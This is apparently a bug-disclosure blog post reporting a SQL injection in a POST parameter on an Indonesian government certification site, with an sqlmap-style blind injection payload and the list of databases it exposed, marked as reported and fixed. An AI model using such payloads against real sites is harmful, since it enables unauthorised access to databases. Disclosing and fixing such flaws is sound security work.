Wednesday, December 19, 2018

Bugs http://ppsdmmigas.esdm.go.id/sertifikasi/

DOMAIN : http://ppsdmmigas.esdm.go.id/sertifikasi/
BUGS : SQL Injection
DATE : 15 Desember 2018
LEVEL : High Risk

POST parameter 'kategori' is vulnerable.

Parameter: kategori (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: kategori=(SELECT (CASE WHEN (6253=6253) THEN 6253 ELSE 6253*(SELECT 6253 FROM INFORMATION_SCHEMA.PLUGINS) END))&keyword=admin

---

available databases [9]:
[*] dimigas
[*] dimigas_javan
[*] dmigas_javan_bak
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] sertifikasi
[*] smscenter
[*] wordpress

---
Sudah dilaporkan pada tanggal 15 Desember 2018.
Status : Telah diperbaiki.




No comments: